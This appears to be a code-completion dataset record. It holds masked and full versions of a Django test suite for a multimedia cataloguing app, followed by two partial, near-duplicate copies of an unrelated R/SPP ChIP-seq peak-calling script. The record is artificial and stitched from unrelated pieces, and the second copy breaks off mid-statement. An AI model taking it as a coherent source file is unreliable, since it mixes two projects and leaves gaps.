\"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n 
self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n 
'/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
"step-3": "<mask token>\n\n\ndef minimal_form_data():\n \"\"\"\n Define a minimal fields for submit a media form\n \"\"\"\n form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',\n 'media_type': '1',\n 'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',\n 'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',\n 'main-keyword-content_type-object_id-TOTAL_FORMS': '0',\n 'main-keyword-content_type-object_id-INITIAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}\n return form_data\n\n\n<mask token>\n\n\nclass MultimediaTest(BaseTestCase):\n \"\"\"\n Tests for multimedia app\n \"\"\"\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',\n name='Teste')\n\n def test_list_media(self):\n \"\"\"\n Test list media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/')\n self.assertContains(response, 'Midia de teste (BR1.1')\n self.assertNotContains(response, 'Media de prueba (PY3.1)')\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n 
\"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n 
follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n '/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
"step-4": "<mask token>\n\n\ndef minimal_form_data():\n \"\"\"\n Define a minimal fields for submit a media form\n \"\"\"\n form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',\n 'media_type': '1',\n 'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',\n 'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',\n 'main-keyword-content_type-object_id-TOTAL_FORMS': '0',\n 'main-keyword-content_type-object_id-INITIAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}\n return form_data\n\n\ndef complete_form_data():\n \"\"\"\n Define missing fields for a valid submission of media object\n \"\"\"\n missing_fields = {'link': 'http://www.youtube.com', 'publication_date':\n '01/12/2015', 'main-descriptor-content_type-object_id-TOTAL_FORMS':\n '1', 'main-descriptor-content_type-object_id-0-id': '',\n 'main-descriptor-content_type-object_id-0-text': 'malaria',\n 'main-descriptor-content_type-object_id-0-code': '^d8462',\n 'main-descriptor-content_type-object_id-0-status': '0',\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '1',\n 'main-resourcethematic-content_type-object_id-0-thematic_area': '1',\n 'main-resourcethematic-content_type-object_id-0-status': '0'}\n complete_form_data = minimal_form_data()\n complete_form_data.update(missing_fields)\n return complete_form_data\n\n\ndef create_media_object():\n \"\"\"\n Create media object for tests\n \"\"\"\n media1 = Media.objects.create(status=0, title='Midia de teste (BR1.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=1,\n cooperative_center_code='BR1.1')\n media_ct = ContentType.objects.get_for_model(media1)\n descriptor = Descriptor.objects.create(object_id=1, content_type=\n media_ct, text='malaria')\n thematic = ResourceThematic.objects.create(object_id=1, content_type=\n media_ct, thematic_area_id=1)\n media2 = Media.objects.create(status=0, title='Media de prueba 
(PY3.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=2,\n cooperative_center_code='PY3.1')\n\n\nclass MultimediaTest(BaseTestCase):\n \"\"\"\n Tests for multimedia app\n \"\"\"\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',\n name='Teste')\n\n def test_list_media(self):\n \"\"\"\n Test list media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/')\n self.assertContains(response, 'Midia de teste (BR1.1')\n self.assertNotContains(response, 'Media de prueba (PY3.1)')\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n 
self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 
'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n '/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
"step-5": "# coding: utf-8\n\nfrom django.test.client import Client\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom main.models import Descriptor, ResourceThematic, ThematicArea\n\nfrom utils.tests import BaseTestCase\nfrom models import *\n\ndef minimal_form_data():\n '''\n Define a minimal fields for submit a media form\n '''\n\n form_data = {\n 'status': '0',\n 'title': 'Foto 1',\n 'description': 'Foto 1',\n 'media_type' : '1',\n\n 'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',\n 'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',\n\n 'main-keyword-content_type-object_id-TOTAL_FORMS': '0',\n 'main-keyword-content_type-object_id-INITIAL_FORMS': '0',\n\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',\n 'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0',\n }\n\n return form_data\n\ndef complete_form_data():\n '''\n Define missing fields for a valid submission of media object\n '''\n\n missing_fields = {\n 'link' : 'http://www.youtube.com',\n 'publication_date' : '01/12/2015',\n\n 'main-descriptor-content_type-object_id-TOTAL_FORMS' : '1',\n\n 'main-descriptor-content_type-object_id-0-id' : '',\n 'main-descriptor-content_type-object_id-0-text' : 'malaria',\n 'main-descriptor-content_type-object_id-0-code' : '^d8462',\n 'main-descriptor-content_type-object_id-0-status' : '0',\n\n 'main-resourcethematic-content_type-object_id-TOTAL_FORMS' : '1',\n 'main-resourcethematic-content_type-object_id-0-thematic_area' : '1',\n 'main-resourcethematic-content_type-object_id-0-status' : '0',\n }\n\n complete_form_data = minimal_form_data()\n complete_form_data.update(missing_fields)\n\n return complete_form_data\n\n\ndef create_media_object():\n '''\n Create media object for tests\n '''\n\n # Create a Media object and test that is present on list\n media1 = Media.objects.create(status=0,title='Midia de teste (BR1.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=1,\n 
cooperative_center_code='BR1.1')\n\n media_ct = ContentType.objects.get_for_model(media1)\n descriptor = Descriptor.objects.create(object_id=1, content_type=media_ct, text='malaria')\n thematic = ResourceThematic.objects.create(object_id=1, content_type=media_ct, thematic_area_id=1)\n\n media2 = Media.objects.create(status=0,title='Media de prueba (PY3.1)',\n media_type_id=1, link='http://bvsalud.org', created_by_id=2,\n cooperative_center_code='PY3.1')\n\n\nclass MultimediaTest(BaseTestCase):\n \"\"\"\n Tests for multimedia app\n \"\"\"\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n\n # create auxiliary models used on tests\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1', name='Teste')\n\n\n def test_list_media(self):\n \"\"\"\n Test list media\n \"\"\"\n self.login_editor()\n create_media_object()\n\n response = self.client.get('/multimedia/')\n self.assertContains(response, \"Midia de teste (BR1.1\")\n\n # list only medias from user cooperative center (BR1.1)\n self.assertNotContains(response, \"Media de prueba (PY3.1)\")\n\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n\n # invalid submission with missing required fields\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data )\n\n self.assertContains(response,'Por favor verifique os campos obrigatórios')\n self.assertContains(response,'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,'Você precisa selecionar pelo menos uma área temática')\n\n # complete form_data with required fields and re-submit form\n form_data = complete_form_data()\n\n # test valid submission\n # after submit a valid content the view will redirect to /multimedia and list the objects\n # follow=True will allow check if the new data is on the list\n response = self.client.post('/multimedia/new', form_data, follow=True)\n 
self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, \"Foto 1\")\n\n # check if is set cooperative center code of user (editor = BR1.1)\n self.assertEquals(Media.objects.all()[0].cooperative_center_code, \"BR1.1\")\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n\n # Test if return form with fields\n self.assertContains(response, media_test.title)\n\n # Test changes values and submit\n form_data = complete_form_data()\n form_data['status'] = '1'\n\n response = self.client.post(url, form_data)\n # check for validation of descriptor and thematic area for status = Admitted\n self.assertContains(response, \"é necessário ter pelo menos um descritor\")\n\n # check for normal edition\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, \"Foto 1\")\n\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, \"Você tem certeza que deseja apagar?\")\n\n response = self.client.post('/multimedia/delete/1')\n\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count() == 0)\n\n self.assertRedirects(response, '/multimedia/')\n\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n\n # check if documentalist has access to list media-types\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/' )\n\n # 403 = unauthorized\n self.assertEqual(response.status_code, 403)\n\n self.client.logout()\n self.login_admin()\n\n 
response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, \"Video\")\n\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n\n # check if documentalist has access to create new media-types\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new' )\n\n # 403 = unauthorized\n self.assertEqual(response.status_code, 403)\n\n self.client.logout()\n self.login_admin()\n\n form_data = {\n 'status': '0',\n 'acronym': 'foto',\n 'name': 'Foto',\n 'language' : 'pt-br',\n 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0',\n }\n\n response = self.client.post('/multimedia/media-type/new', form_data, follow=True )\n\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, \"Foto\")\n\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n\n # Create a media collection object and test that is present on list\n MediaCollection.objects.create(name='Coleção 1',\n description='Coleção de teste 1',\n created_by_id=1, cooperative_center_code='BR1.1')\n\n MediaCollection.objects.create(name='Coleção 2',\n description='Coleção de teste 2',\n created_by_id=2, cooperative_center_code='BR1.1')\n\n MediaCollection.objects.create(name='Coleção 3',\n description='Coleção de teste 3',\n created_by_id=3, cooperative_center_code='PY3.8')\n\n\n response = self.client.get('/multimedia/collections')\n # check if only one collection is returned (restrict by user)\n self.assertContains(response, \"Coleção 1\")\n self.assertEquals(response.context['object_list'].count(), 3)\n\n # check if return only colections from cooperative center BR1.1\n response = self.client.get('/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n 
self.login_editor()\n\n form_data = {\n 'name': 'Coleção nova',\n 'description': 'Coleção de teste',\n 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0',\n }\n\n response = self.client.post('/multimedia/collection/new', form_data, follow=True )\n\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, \"Coleção nova\")\n",
"step-ids": [
8,
9,
12,
14,
16
]
}
|
[
8,
9,
12,
14,
16
] |
<|reserved_special_token_0|>
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
<|reserved_special_token_0|>
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
<|reserved_special_token_0|>
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
